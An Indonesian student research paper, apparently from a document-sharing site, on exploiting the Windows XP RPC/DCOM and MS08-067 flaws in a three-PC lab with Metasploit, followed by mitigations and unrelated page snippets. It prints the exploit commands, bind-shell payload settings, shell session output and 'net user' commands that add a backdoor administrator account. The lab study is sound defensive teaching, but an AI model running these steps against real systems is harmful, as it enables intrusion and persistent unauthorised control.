Eksploitasi Keamanan Sistem Operasi Windows XP Pada Jaringan LAN

Ukuran: px
Mulai penontonan dengan halaman:

Download "Eksploitasi Keamanan Sistem Operasi Windows XP Pada Jaringan LAN"

Transkripsi

1 Eksploitasi Keamanan Sistem Operasi Windows XP Pada Jaringan LAN NASKAH PUBLIKASI Disusun Oleh : ASADU RAHMATIKA ROCHIM JURUSAN TEKNIK INFORMATIKA SEKOLAH TINGGI MANAJEMEN INFORMATIKA DAN KOMPUTER AMIKOM YOGYAKARTA

2 2

3 ABSTRACT On the network (network) there are various kinds of protocols that each have unique functions. One of them is the protocol Remote Procedure Call (RPC). This protocol provides an inter-process communication mechanism that allows a program to run on a computer without a felt any code execution on a remote system (remote system). In this protocol there are also other functions such as protocol message, RPC features, etc.. Each of these functions are contained in three layers of RPC is the highest layer, middle, and lowest. Each layer in contact with different parts of the operating system. RPC protocol implementation includes a more complex sectors, ranging from port mapping, the language used in the RPC programming and how it works. In addition to discussing the RPC protocol, in this study will be discussed on the exploitation RPC protocol on Windows XP and RPC protocol is one of intruders in Windows XP operating system Exploitation is the misuse is the original function of this protocol for other activities which harm nature diremote parties and make the system the information contained therein is not safe. Keywords: Remote Procedure Call, Exploitation,Information Systems, VCVCVCVOperating Systems 3

4 PENDAHULUAN 1.1 Latar Belakang Masalah. Windows XP merupakan salah satu sistem operasi yang banyak digunakan dengan salah satu keunggulannya yaitu User-Friendly. Dibalik keunggulan tersebut, integritas sistem operasi untuk berjalan pada aplikasi jaringan jauh tertinggal dibandingkan sistem operasi lainnya seperti Linux atau Unix. Salah satu kelemahan sistem operasi ini yang banyak digunakan para penyusup adalah protokol RPC ( Remote Procedure Call ). Serangan celah keamanan RPC Dcom yang pernah populer di tahun 2003 terjadi pada tanggal 12 Agustus 2003 dimana dimanfaatkan dengan sangat baik oleh worm Lovsan atau lebih dikenal dengan nama Blaster dan variannya menyebabkan semua komputer Windows NT / 2000 / XP / 2003 saling melakukan scanning untuk menyebarkan dirinya dan sempat menggegerkan jagad internet. Eksploitasi celah keamanan RPC Dcom kemudain kembali muncul di tahun dimana trend yang terjadi adalah satu malware yang memiliki kemampuan mengeksploitasi berbagai celah keamanan dan terkadang satu malware mengeksploitasi belasan celah keamanan. Setelah serangan tersebut mereda, kelihatannya di akhir tahun 2008 ini kembali muncul peluang eksploitasi baru atas celah keamanan RPC Dcom lagi dan kali ini cukup serius karena Windows XP dengan Service Pack 3 sekalipun tetap rentan terhadap eksploitasi celah keamanan RPC Dcom baru ini. 4

5 2. Subjek Penelitian Subjek penelitian adalah pengujian operating sistem yang direncanakan untuk pembelajaran dan mengetahui celah kelemahan pada sistem tersebut. Pengujian ini dilakukan dengan tiga buah komputer yang saling dikoneksikan satu sama lain dalam satu jaringan local (LAN). Dan selanjutnya yang perlu diperhatikan dari penelitian tersebut bagaimana teknik melakukan penyusupan ke dalam komputer lain dan bagaimana pencegahannya agar tidak terjadi serangan atau dapat dikendalikan oleh user lain. Sehingga komputer kita aman dari para penyusup. 2.1 Perangkat Lunak. Perangkat lunak yang digunakan dalm penelitian ini adalah sistem operasi WINDOWS XP Service Pack 1,2 dan 3, serta aplikasi sebagai tools untuk melakukan eksploitasi yaitu Metasploit 3. Metasploit. Gambar 3.2 Metasploit Metasploit Framework adalah sebuah platform pengembangan untuk membuat tool keamanan dan exploit. Metasploit Framework terdiri dari tools, libraries, modules dan user interfaces. Fungsi dasar dari metasploit framework 5

6 adalah memunculkan module, membiarkan penggunanya mengkonfigurasikan modul exploit dan mencobanya pada target yang dituju. Jika exploit berhasil, payload akan tereksekusi pada sistem target dan pengguna akan disediakan sebuah shell untuk berinteraksi dengan payload. Metasploit berjalan pada berbagai operating sistem, termasuk Linux, Windows, Mac OS X, dan sebagian besar dari BSD. Metasploit telah digunakan pada berbagai macam platform hardware, dari Unix mainframe sampai ke iphone. 3. Analisis Sistem. 3.1 Anlisis Kinerja Sistem Pada Jaringan. Berdasarkan topologi jaringan yang ada, maka dalam penelitian ini penggunaan topologi star yang telah dibuat tidak mengalami gangguan pada pertukaran jalur data dari satu kompter ke komputer yang lain atau dengan kata lain kinerja jaringan serta sistem dalam pertukaran data berfungsi dengan baik, dikarenakan computer yang terhubung dalam jaringan berjumlah 3 buah atau jaringan kecil. 3.2 Analisis Kelemahan Sistem. Kelemahan RPC pada Sistem Operasi Windows. Sistem operasi Microsoft Windows XP adalah salah satu sistem operasi yang mendukung protokol RPC. Kelemahan protokol RPC pada sistem operasi ini terletak pada fungsi RPC yang berhubungan dengan pertukaran message melalui protokol TCP/IP. Hal ini mempengaruhi bagian antar-muka Distributed Component Object Model (DCOM) yang berhubungan dengan RPC, yang akan mendengarkan ( listen ) port-port RPC 6

7 yang tersedia. DCOM adalah protokol yang berfungsi untuk mengaktifkan komponen pada perangkat lunak ( software ) agar dapat berkomunikasi langsung dengan jaringan. Protokol ini didesain untuk penggunaan jaringan multi tranport termasuk protokol Internet misalnya HTTP. Kecenderungan lain berpindah pada nomor port lain yang dapat digunakan untuk mengirim pesan tertentu yang telah dimanipulasi, seperti port 135, 139, 445, 593 pada remote komputer. Melalui port-port ini maka seorang user dapat melakukan permintaan yang dapat mengekploitasi dengan menjalankan kode dengan hak sistem lokal. Berikut ini tabel protokol yang sering dimanfaatkan pada ekploitasi RPC. Tabel 3.1 Port dan Protokol yang umum dieksploitasi Urutan Protokol yang digunakan oleh Endpoint Mapper ncacn ip tcp ncacn ip udp ncacn np pipe emapper ncacn http ncacn http dengan servis COM Internet aktif Port TCP atau UDP TCP/135 UDP/135 TCP/139 dan TCP/445 TCP/593 TCP/180 Analisis PIECES Sistem. Dari pemaparan tersebut maka penulis anlisa dengan metode PIECES ( Performance, Information, Economic, Control, Efficiency, Service ). Sebagai berikut: 7

8 1. Analisis Kinerja (Performance Analysis) Sistem windows XP yang lama memiliki kelemahan pada sistem RPC sehingga akan berdampak dalam kinerja sistem. Kinerja tersebut akan tergangguan ketika seorang penyusup telah mampu mengeksplotasi sistem. Gangguan kinerja sistem bergantung dari kegiatan yang dilakukan oleh penyusup, namun jika penyusup sedang tidak melakukan kegiatan terhadap komputer yang tereksploitasi maka gangguan terhadap sstem tidak berpengaruh. 2. Analisis Informasi (Information Analysis) Sistem lama tidak mampu memberikan keamanan informasi, karena infomasi yang ada pada sistem lama ketika sistem tereksploitasi maka seorang penyusup dapat melakukan tidakan apapun terhadap informasi yang ada pada sistem.dan dapat menghambat informasi pada sistem ketika diakses oleh penyusup. 3. Analisis Ekonomi (Economy Analysis) Secara ekonomi sistem lama yang telah berjalan pada saat ini membutuhkan biaya yang sangat besar ketika sistem telah tereksploitasi oleh penyusup. Kemungkinan terjadi adalah adanya kerusakan sistem dan pengambilan data-data yang ada pada sistem lama. jika itu terjadi maka sistem harus di instal ulang dan data yang telah diambil oleh penyusup kemungkinan akan hilang dan jika data itu benar-benar hilang maka dilakukan pencarian data ulang. 4. Analisis Pengendalian (Control Analysis) 8

9 Pada sistem yang sudah ada, pengendalian dapat dilakukan oleh user lain sepenuhnya tanpa adanya memperdulikan status hak acces sistem. Hal inilah yang menjadi penyebab utama kelemahan pada sistem lama. 5. Analisis Efisiensi (Efficiency Analysis) Sistem lama yang berjalan belum sepenuhnya efesien, mengingat ketika sistem itu tereksploitasi maka sistem akan dikendalikan oleh penyusup sistem dan ketika penyusup menghilangkan hak acces terhadap sistem dan mengambil data yang ada. maka pemilik sistem akan melakukan install ulang sistem dan membuat data-data ulang yang telah diambil oleh penyusup. Hal ini akan membutuhkan biaya waktu dan sumberdaya yang menyebabkan tidak ke-efisienan. 6. Analisis Pelayanan (Service Analysis) Pelayanan informasi yang dihasilkan oleh sistem lama belum dapat memenuhi kebutuhan informasi yang diperlukan oleh pemilik sistem. Kelemahan pada servis RPCSS pada sistem lama adalah penyebab utama dari pelayan sistem. 3.3Stategi Pemecahan Masalah.. Dari analisa permasalahan diatas penulis menggaris bawahi bahwa permasalahan utama pada sistem lama windows XP adalah tingkat kelemahan pada port 135,445, dll seperti pada tabel 2.1 diatas. Untuk itu strategi pemecahan masalah yang penulis lakukan adalah \ kelemahan pada sistem lama dalam hal ini port-port yang terkait dengan sumber permasalahan akan ditutup atau dapat juga dilakukan pemfilteran dengan firewall atau sejenisnya. Adapun pembahsan mengenai hal tersebut akan disampaikan pada bab berikutnya. Sedangkan topologi jaringan tetap menggunakan topologi 9

10 yang lama dikarenakan kebutuhan akan jaringan masih dalam tingkat kecil. Jika pada jaringan yang lebih luas atau besarpun penulis menyarankan menggunakan topologi Star walaupun dari segi instalasi akan memerlukan banyak pengkabelan, tetapi dari segi penggunaan jika salah satu node putus maka node yang lain masih tetap berjalan. 4. Implementasi Eksploitasi RPC. Eksploitasi disini yaitu dengan melakukan penyusupan ke sistem operasi Microsoft Windows XP SP1, Windows XP SP2, dan Windows XP SP Eksploitasi Menggunakan Program. Pada implemenatasi ekplotasi ini penulis akan menguji sistem operasi Windows XP. Pengujian Windows XP SP1 Sebelum melakukan pengujian lebih jauh. Kita akan melakukan pengujian koneksi ke komputer yang akan kita serang dalam hal ini komputer2 dengan no IP address Pengujian tes koneksi dapat dilakukan dengan mengetikkan script ping pada Command Prompt seperti tampak pada gambar di bawah ini. 10

11 Gambar 4.4 akses command prompt komputer2 di komputer1 Pada gambar diatas tampak pengkoneksian telah berhasil dengan keterangan terdapat 4 paket data terkirim 0% lost ke no IP Kemudian pada tahap selanjutanya kita aktifkan program Metasploit dan kita pilih Menu Console. Setelah itu kita akan melihat berbagai macam exsploit yang ada pada Metasploit dengan perintah : msf > show exploits dan sebagian dari list seluruh exploit yang ada kira-kira seperti dibawah ini : Exploits ======== Name Description windows/dcerpc/ms03_026_dcom windows/dcerpc/ms05_017_msmq Microsoft RPC DCOM Interface Overflow Microsoft Message Queueing Service Path Overflow Selanjutnya penulis menggunakan exsploit windows /dcerpc/ ms03_026_dcom untuk menyerang komputer2. msf > use windows/dcerpc/ms03_026_dcom msf exploit(ms03_026_dcom) > Selanjutnya kita perlu set terlebih dahulu RHOST dari komputer target dengan mengetikkan : msf exploit(ms03_026_dcom) > set RHOST RHOST => Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 135. Untuk exploit target diisi 11

12 dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. msf exploit(ms03_026_dcom) > set HOST 0 HOST => 0 Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini menggunakan tcp_bind_shell (akses command prompt di kompi target) : msf exploit(ms03_026_dcom) > set payload windows/shell/bind_tcp payload => windows/shell/bind_tcp untuk melihat payload apa saja dalam Metasploit kita gunakan perintah : msf exploit(ms03_026_dcom) > show payloads Selanjutnya kita jalankan exploit : msf exploit(ms03_026_dcom) > exploit Gambar 4.6 hasil proses dan exploitasi Dari hasil diatas, kita telah berhasil masuk ke komputer target dalam hal ini komputer2 dan kita telah mengakses Command Prompt komputer2. selanjutnya 12

13 kita akan coba melihat IP Configurasi pada komputer2 dengan cara ketik perintah ipconfig C:\WINDOWS\sistem32> ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix. : IP Address : Subnet Mask : Default Gateway : C:\WINDOWS\sistem32> Pengujian pada Windows Untuk pengujian pada Windows XP SP2 ini penulis telah melakukan percobaan dengan metode yang sama namun tidak dapat menembus target yang kali ini adalah komputer3 dengan no IP Address hasil dari percobaan pada windows XP SP2 ini sebagai berikut: Test konekesi ke komputer3 Gambar 4.7 tes koneksi komputer ke komputer3 Gambar 4.7 hasil test koneksi ke komputer3. Kemudian penulis mencoba menyerang dengan metode yang sama juga namun berbeda eksploit yang akan kita gunakan untuk penyerangan. Percobaan 13

14 kali ini menggunakan eksploit windows /smb/ms08_067_netapi eksploit ini bekerja untuk melumpuhkan NetAPI32.dll pada windows XP SP1,2 dan 3. Hasil percobaan Msf > show exploits Exploits ======== Name Description nwapi32.dll windows /smb/ms06_066_nwwks windows /smb/ms08_067_netapi Microsoft Services MS nwwks.dll Microsoft Server Service Relative Path Stack Corruption msf > use windows /smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST RHOST => msf exploit(ms08_067_netapi) > show payloads generic/shell_reverse_tcp Generic Command Shell, Reverse TCP Inlinen Selanjutnya kita set payloads msf exploit(ms08_067_netapi) > set payload generic/shell_bind_tcp payload => generic/shell_bind_tcp msf exploit(ms08_067_netapi) > set HOST 0 HOST => 0 Sekarang kita jalankan exploitnya msf exploit(ms08_067_netapi) > exploit dan hasilnya : host => 0 >> exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP Service Pack 2 - lang:english [*] Selected Target: Windows XP SP2 English (NX) [*] Triggering the vulnerability... 14

15 [*] Command shell session 1 opened ( :1794 -> :4444) Microsoft Windows XP [Version ] (C) Copyright Microsoft Corp. C:\WINDOWS \sistem32> Dari gambar diatas kita telah masuk ke sistem komputer3. dan sekali lagi terdapat celah yang bisa kita masuki pada sistem operasi windows xp SP2 dan SP3 4.2 Eksekusi Kode. Tahap ini merupakan tahap eksekusi kode yang diinginkan. Pada tahap ini komputer1 dapat melakukan melakukan apa saja. Pada contoh kasus ini akan dicoba untuk membuat sebuah account baru dengan hak seorang Administrator. Eksekusi kode pembuatan user baru ini pada setiap operating sistem yang kita eksploitasi menggunakan metode yang sama. Setelah masuk pada sistem komputer2, terlebih dahulu kita lihat siapa saja yang memiliki hak login di komputer2 caranya ketik perintah net user. C:\WINDOWS\sistem32>net user Dan hasilnya sebagai berikut : Gambar 4.10 account user pada sistem 15

16 Selanjutanya kita gunakan perintah berikut untuk mengeksekusi pembuatan user baru dengan password 123 : net user asadu2 123 /add dan kita lihat hak user baru tadi dengan perintah: net user asadu2 kita lihat hasilnya Gambar 4.12 info account user baru pada sistem Dari gambar diatas dapat kita ketahui hak user asadu2 masih sebagai user biasa atau tidak dapat melakukan pengendalian terhadap sistem secara penuh. Untuk itu hak user ini kita diubah menjadi hak Administrator dengan cara ketik perintah : 16

17 net localgroup Administrators asadu2 /add dan untuk melihat hasil pengubahan hak menjadi administrator ketik pertintah : net user asadu2 Dengan demikian pada pada komputer2 akan didapatkan satu user baru bernama asadu2 dengan hak seorang administrator. Implementasi ini dapat dilakukan untuk tujuan baik, misalnya pada kasus hilangnya password seorang user yang memiliki hak sebagai Administrator. Namun pada dasarnya hal ini sendiri adalah kelemahan utama didalam sistem keamanan pada sistem operasi. Selain pembuatan user baru, eksekusi kode yang dapat dilakukan lainnya antara lain upload atau download data dari dan ke komputer2, perusakan sistem, dll. 4.3 Pencegahan Eksploitasi RPC Berikut ini adalah beberapa cara yang dapat digunakan untuk melakukan hal ini ( dikutip dari buletin keamanan Microsoft MS dan buletin keamanan Microsoft MS08-067): 1. Memblokir port 135, 137, 138 dan 445 pada UDP dan port 135, 149, 445, dan 593 pada TCP melalui Firewall. Disfungsikan COM Internet Services ( CIS ) dan RPC melalui HTTP yang menggunakan port 80 dan 443 terutama pada jaringan remote yang menggunakan VPN ( Virtual Private Network ) atau sejenisnya. 2. Gunakan personal Firewall seperti Internet Connection Firewall. 3. Blokir semua port sering diekploitasi dengan menggunakan filter IPSEC. 4. Disfungsikan tur DCOM pada setiap komputer atau server. Disable 17

18 DCOM on all affected machines 5. Khusus Sistem operasi buatan Microsoft, selalu update security Patch untuk meningkatkan keamanan sistem operasi tersebut. Dampak dari pemblokiran tersebut adalah diblokirnya file sharing yang ada pada sistem dan ketika komputer terkoneksi jaringan maka akan sangat merugikan. Namun agar sistem dapat bekerja secara optimal, sebaiknya dan disarankan untuk mengupdate sistem dengan mempatch kesalahan pada sistem tersebut ke Microsoft Kesimpulan Formatted: Bullets and Numbering Dari implementasi yang telah dilakukan dapat diambil kesimpulan sebagai berikut: 1. Terdapat celah pada remote procedure call system Operasi Windows XP 2. Dampak yang terjadi dari kelemahan tersebut user yang tidak diinginkan dapat mengambil alih system. 3. Sesungguhnya tidak ada sistem yang seratus persen aman dari kebocoran dan kelemahan. Yang ada adalah sistem yang belum teruji keamanannya. 5.2 Saran Sebagai seorang pemilik komputer personal atau seorang administrator sudah seyogyanya untuk terus menerus mengambil tindakan preventif agar sistem yang dijaganya tetap stabil dan terhindar dari kelemahan yang bisa dimanfaatkan orang lain. Tindakan tersebut dapat berupa: 1. mengupdate sistem secara keseluruhan ke vendor pembuatnya. 2. memasang software anti virus dan mengupdatenya setiap waktu 18

19 terkadang banyak orang yang tidak bertanggung jawab melakukan eksploitasi sistem dengan menggunakan metode yang sudah pernah di lakukan sebelumnya, untuk itu jika kita seorang administrator jaringan hendaknya tetap mempelajari metode eksploitasi baik yang telah lampau di gunakan ataupun yang baru, sehingga sistem kita tidak mudah tereksplotasi dan jika tereksploitasipun kita sudah tahu cara penangananya Daftar Pustaka Pangera Ali Abbas, Ariyus Doni, 2005, Sistem Operasi, Penerbit Andi, Yogyakarta. Tanembaum S Andrew., 1996, Jaringan Komputer Edisi Bahasa Indonesia Jilid 1, Pearson Education Asia Pte.ltd,Prentice-Hall Inc. Oetomo Dharma Sutedjo Budi. Dkk, 2006, Konsep & Aplikasi Pemrograman Client-Server dan Sistem Terdistribusi, Penerbit Andi, Yogyakarta. Syahfrizal Melwin, 2005, Pengantar Jaringan Komputer, Penerbit Andi, Yogyakarta. Outlines Schaum s, 2004, Computer Networking, Penerbit Erlangga, Jakarta. Marki Tommy, 2003, Keamanan System Informasi RPC, diakses tgl 15 September diakses tanggal 2 September diakses tanggal 24 November

20 diakses tanggal 24 November

Gambar 18. Koneksi Peer to Peer. Switch. Komputer B. Gambar 19. Topologi Star menggunakan 3 PC

Gambar 18. Koneksi Peer to Peer. Switch. Komputer B. Gambar 19. Topologi Star menggunakan 3 PC WORKSHOP INTERNET PROTOCOL (IP) 1. ALAT DAN BAHAN Alat dan bahan yang digunakan antara lain : 1. Switch 1 buah 2. Kabel cross-over (2 meter) 1 buah 3. Kabel straight-through @ 2 meter 3 buah 4. Komputer

Lebih terperinci

Jl. Raya Dukuhwaluh PO. Box 202 Purwokerto )

Jl. Raya Dukuhwaluh PO. Box 202 Purwokerto ) untuk Mendeteksi Serangan Jaringan di Universitas Muhammadiyah Purwokerto ( for Detecting Network Atacks in Muhammadiyah University of Purwokerto) Harjono 1), Agung Purwo Wicaksono 2) 1) 2) Teknik Informatika,

Lebih terperinci

I. PENDAHULUAN. jaringan dan aplikasi yang dibuat khusus untuk jaringan. Akibatnya, interaksi

I. PENDAHULUAN. jaringan dan aplikasi yang dibuat khusus untuk jaringan. Akibatnya, interaksi I. PENDAHULUAN 1.1 Latar Belakang Perkembangan teknologi komputer, khususnya dalam hal jaringan komputer sangatlah pesat karena saat ini sudah banyak berbagai macam jenis peralatan jaringan dan aplikasi

Lebih terperinci

Konfigurasi Dan Instalasi Jaringan( TCP/IP ) Di Windows Server 2003

Konfigurasi Dan Instalasi Jaringan( TCP/IP ) Di Windows Server 2003 Konfigurasi Dan Instalasi Jaringan( TCP/IP ) Di Windows Server 2003 Di sini saya akan mendeskripsikan prosedur untuk menginstal dan mengkonfigurasi TCP/IP Microsoft Windows Server 2003. Ikuti prosedur

Lebih terperinci

BAB IV HASIL DAN PEMBAHASAN

BAB IV HASIL DAN PEMBAHASAN BAB IV HASIL DAN PEMBAHASAN 4.1 Implementasi Secara Umum Implementasi sistem merupakan tahap dimana sistem mampu diaplikasikan dalam keadaan yang sesungguhnya. Dari implementasi ini akan diketahui apakah

Lebih terperinci

Membuat Router dengan NAT pada Windows XP

Membuat Router dengan NAT pada Windows XP Membuat Router dengan NAT pada Windows XP Kebutuhan : PC Windows XP, 2 buah NIC, Tool NETSH dan akses Administrator Router berguna untuk menggabungkan suatu jaringan komputer dengan atau ke jaringan komputer

Lebih terperinci

Management Oleh : Felix Andreas Sutanto

Management Oleh : Felix Andreas Sutanto Microsoft Windows : Vulnerability and Patch Management Oleh : Felix Andreas Sutanto Masalah keamanan selalu menjadi isu yang paling penting dalam pemilihan sistem operasi. Hal ini terbukti dengan suatu

Lebih terperinci

BAB III ANALISA DAN PEMBAHASAN MASALAH

BAB III ANALISA DAN PEMBAHASAN MASALAH BAB III ANALISA DAN PEMBAHASAN MASALAH 3.1 Analisa Analisa yang penulis lakukan adalah memberikan ilustrasi berupa gambaan umum, keadaan saat ini dan kendala yang dihadapi sebagai berikut: 3.1.1 Gambaran

Lebih terperinci

BAB IV IMPLEMENTASI DAN PENGUJIAN SISTEM

BAB IV IMPLEMENTASI DAN PENGUJIAN SISTEM BAB IV IMPLEMENTASI DAN PENGUJIAN SISTEM Pada bab ini akan dilakukan implementasi dan pengujian terhadap sistem siteto-site VPN yang dibangun. Implementasi dilakukan berdasarkan analisis dan perancangan

Lebih terperinci

PERANCANGAN SISTEM Perancangan Topologi Jaringan Komputer VPN bebasis L2TP dan IPSec

PERANCANGAN SISTEM Perancangan Topologi Jaringan Komputer VPN bebasis L2TP dan IPSec BAB 4. PERANCANGAN SISTEM Pada bab ini akan menjelaskan tahap perancangan sistem Virtual Private Network (VPN) site-to-site berbasis L2TP ( Layer 2 Tunneling Protocol) dan IPSec (Internet Protocol Security),

Lebih terperinci

FTP Server. Konfigurasi Server Konfigurasi FTP. 1. Klik Menu Start All Programs Control Panel Add/Remove Program

FTP Server. Konfigurasi Server Konfigurasi FTP. 1. Klik Menu Start All Programs Control Panel Add/Remove Program FTP Server File Transfer Protocol (FTP) adalah suatu protokol yang berfungsi untuk tukar-menukar file dalam suatu network yang menggunakan TCP koneksi bukan UDP. Dua hal yang penting dalam FTP adalah FTP

Lebih terperinci

Berbagi Koneksi Internet Di Virtualbox

Berbagi Koneksi Internet Di Virtualbox Berbagi Koneksi Internet Di Virtualbox Kebanyakan pengguna aplikasi Virtualisasi seperti Virtualbox hanya memaksimalkan fungsi alikasinya sebagai stand-alone atau hanya digunakan sebatas mengeksplorasi

Lebih terperinci

ANALISIS PERBANDINGAN METODE ENKRIPSI PADA JARINGAN VPN SERVER PPTP (POINT TO POINT TUNNELING PROTOCOL)

ANALISIS PERBANDINGAN METODE ENKRIPSI PADA JARINGAN VPN SERVER PPTP (POINT TO POINT TUNNELING PROTOCOL) ANALISIS PERBANDINGAN METODE ENKRIPSI PADA JARINGAN VPN SERVER PPTP (POINT TO POINT TUNNELING PROTOCOL) Almubah Hendriza Ali Andri Jefri Tenggono Jurusan Teknik Informatika STMIK PalComTech Palembang ABSTRAK

Lebih terperinci

Manual Book SID-SEKOLAH Manual Book SID-SEKOLAH

Manual Book SID-SEKOLAH  Manual Book SID-SEKOLAH I. INSTALLASI JARINGAN Proses untuk menginstallasi jaringan pada komputer anda. Sebelum melakukan installasi anda harus mempersiapkan dulu satu komputer yang akan digunakan untuk server atau sebagai Central

Lebih terperinci

Membuat FTP di Windows Server 2003

Membuat FTP di Windows Server 2003 Membuat FTP di Windows Server 2003 Oleh : Ari Nugroho FTP merupakan protokol aplikasi pada lingkungan TCP/IP yang berfungsi untuk mentransfer file antar jaringan seperti yang terdapat pada internet. Dengan

Lebih terperinci

SETTING JARINGAN KOMPUTER

SETTING JARINGAN KOMPUTER SETTING JARINGAN KOMPUTER Definisi Jaringan : Jaringan komputer adalah sekumpulan peralatan komputer yang dihubungkan agar dapat saling berkomunikasi dengan tujuan berbagi sumber daya (seperti file dan

Lebih terperinci

Instalasi dan Konfigurasi Jaringan Internet

Instalasi dan Konfigurasi Jaringan Internet Instalasi dan Konfigurasi Jaringan Internet Dokumentasi ini dibuat sebagai panduan dalam melakukan setting jaringan internet sederhana yang umum pada jaringan LAN anda. Saya memastikan bahwa anda sudah

Lebih terperinci

PRAKTIKUM JARINGAN KOMPUTER SEMESTER GENAP MODUL II FILE SHARING DAN PRINT SERVER

PRAKTIKUM JARINGAN KOMPUTER SEMESTER GENAP MODUL II FILE SHARING DAN PRINT SERVER PRAKTIKUM JARINGAN KOMPUTER SEMESTER GENAP MODUL II FILE SHARING DAN PRINT SERVER A. TUJUAN PRAK TIKUM Memahami cara pembuatan jaringan Local Area Network (LAN) Memahami cara menjalankan perintah ping

Lebih terperinci

BAB 4 IMPLEMENTASI DAN EVALUASI. terhadap hasil konfigurasi yang telah diimplementasikan. Adapun evaluasi yang

BAB 4 IMPLEMENTASI DAN EVALUASI. terhadap hasil konfigurasi yang telah diimplementasikan. Adapun evaluasi yang BAB 4 IMPLEMENTASI DAN EVALUASI Bab ini akan membahas secara rinci mengenai langkah-langkah yang dilakukan terhadap rancangan infrastruktur yang telah dilakukan sebelumnya. Setelah proses implementasi

Lebih terperinci

DAFTAR ISI BAB II TINJAUAN PUSTAKA... 11

DAFTAR ISI BAB II TINJAUAN PUSTAKA... 11 DAFTAR ISI HALAMAN JUDUL... i PERNYATAAN... ii HALAMAN PENGESAHAN... iii KATA PENGANTAR... iv HALAMAN PERSEMBAHAN... vi DAFTAR ISI... vii DAFTAR GAMBAR... ix DAFTAR TABEL... xv INTISARI... xvi BAB I PENDAHULUAN...

Lebih terperinci

PENDAHULUAN. Bab Latar Belakang

PENDAHULUAN. Bab Latar Belakang Bab 1 PENDAHULUAN 1.1 Latar Belakang Pada dasarnya jaringan yang bebas dari penyusupan merupakan salah satu syarat sebuah jaringan dikatakan aman dan layak digunakan sebagai media pengiriman data. Seiring

Lebih terperinci

1. Tutorial Setting mail-server pada windows 2003 server

1. Tutorial Setting mail-server pada windows 2003 server 1. Tutorial Setting mail-server pada windows 2003 server Kali ini saya akan membahas bagaimana caranya membuat mail server pada Sistem Operasi Windows 2003 Server. Alasan saya Kenapa menggunakan Windows

Lebih terperinci

Membuat Koneksi Wireless Antar Laptop

Membuat Koneksi Wireless Antar Laptop Membuat Koneksi Wireless Antar Laptop Jaringan komputer adalah kumpulan dari sejumlah perangkat berupa komputer, hub, switch, router, atau perangkat jaringan lainnya yang terhubung dengan menggunakan media

Lebih terperinci

BAB 2 TINJAUAN PUSTAKA

BAB 2 TINJAUAN PUSTAKA BAB 2 TINJAUAN PUSTAKA Bab ini berisikan tentang teori-teori pendukung yang diperlukan untuk mendukung dalam penyelesaian skripsi ini. Teori-teori yang dituliskan pada bab ini yaitu mengenai jaringan komputer,

Lebih terperinci

I. Tujuan. Pendahuluan. Alat dan Bahan. Langkah Kerja. Aziz Izzudin Rendy Reynaldi S. Maulani Rahmi Tantan Faturrahman

I. Tujuan. Pendahuluan. Alat dan Bahan. Langkah Kerja. Aziz Izzudin Rendy Reynaldi S. Maulani Rahmi Tantan Faturrahman Aziz Izzudin Rendy Reynaldi S. Maulani Rahmi Tantan Faturrahman II TKJ-A Diagnosa LAN Mengkonfigurasi PC Router Menggunakan FreeBSD Jumat, 11 Februari 2011 Pak Rudi Haryadi Pak Antony Budiman I. Tujuan

Lebih terperinci

BAB 4 PERANCANGAN DAN EVALUASI

BAB 4 PERANCANGAN DAN EVALUASI 80 BAB 4 PERANCANGAN DAN EVALUASI Seperti yang telah dijelaskan pada bab sebelumnya, solusi yang diberikan untuk menghadapi permasalahan yang sedang dihadapi oleh PT. Solusi Corporindo Teknologi adalah

Lebih terperinci

Membuat Koneksi Antar Dua Laptop Dengan Wifi

Membuat Koneksi Antar Dua Laptop Dengan Wifi Membuat Koneksi Antar Dua Laptop Dengan Wifi BY: Khoirul Khasanah, S.kom Have Nice Day..! 1 Kalau anda mempunyai dua buah laptop atau lebih atau komputer desktop yang mempunyai wireless LAN card (wifi)

Lebih terperinci

Laporan Praktikum. Anggota kelompok : Dayanni Vera Versanika Ichtiar Testament Gea Rizal Putra Ramadhan

Laporan Praktikum. Anggota kelompok : Dayanni Vera Versanika Ichtiar Testament Gea Rizal Putra Ramadhan Laporan Praktikum Anggota kelompok : Dayanni Vera Versanika Ichtiar Testament Gea Rizal Putra Ramadhan WINDOWS SERVER 2008 Laporan ini mencakup tentang : 1. Definisi dari DNS itu sendiri. 2. Cara Kerja

Lebih terperinci

BAB 4 IMPLEMENTASI DAN EVALUASI

BAB 4 IMPLEMENTASI DAN EVALUASI 149 BAB 4 IMPLEMENTASI DAN EVALUASI Pada bab ini akan dibahas mengenai langkah-langkah implementasi yang dilakukan pada rancangan jaringan pada PT Tiki Jalur Nugraha Ekakurir. Pada bab ini juga akan dilakukan

Lebih terperinci

BAB III METODE PENELITIAN DAN PERANCANGAN SISTEM. jaringan. Topologi jaringan terdiri dari 3 client, 1 server, dan 2 router yang

BAB III METODE PENELITIAN DAN PERANCANGAN SISTEM. jaringan. Topologi jaringan terdiri dari 3 client, 1 server, dan 2 router yang BAB III METODE PENELITIAN DAN PERANCANGAN SISTEM 3.1 Metode Penelitian Dalam sistem perancangan ini awal mula dibuat perancangan topologi jaringan. Topologi jaringan terdiri dari 3 client, 1 server, dan

Lebih terperinci

INSTALASI DAN KONFIGURASI DASAR PC-ROUTER DENGAN LINUX REDHAT 9.0

INSTALASI DAN KONFIGURASI DASAR PC-ROUTER DENGAN LINUX REDHAT 9.0 MODUL PRAKTIKUM INSTALASI DAN KONFIGURASI DASAR PC-ROUTER DENGAN LINUX REDHAT 9.0 Pendahuluan Routing adalah cara bagaimana suatu trafik atau lalu lintas dalam jaringan dapat menentukan lokasi tujuan dan

Lebih terperinci

PERCOBAAN 7 KOMUNIKASI WIRELESS MODE AD-HOC

PERCOBAAN 7 KOMUNIKASI WIRELESS MODE AD-HOC PERCOBAAN 7 KOMUNIKASI WIRELESS MODE AD-HOC A. TUJUAN 1. Mahasiswa dapat mengetahui cara kerja WLAN 2. Mahasiswa dapat melakukan konfigurasi WLAN mode ad-hoc 3. Mahasiswa dapat menggunakan aplikasi WLAN

Lebih terperinci

BAB 15 KEAMANAN JARINGAN DENGAN FIREWALL

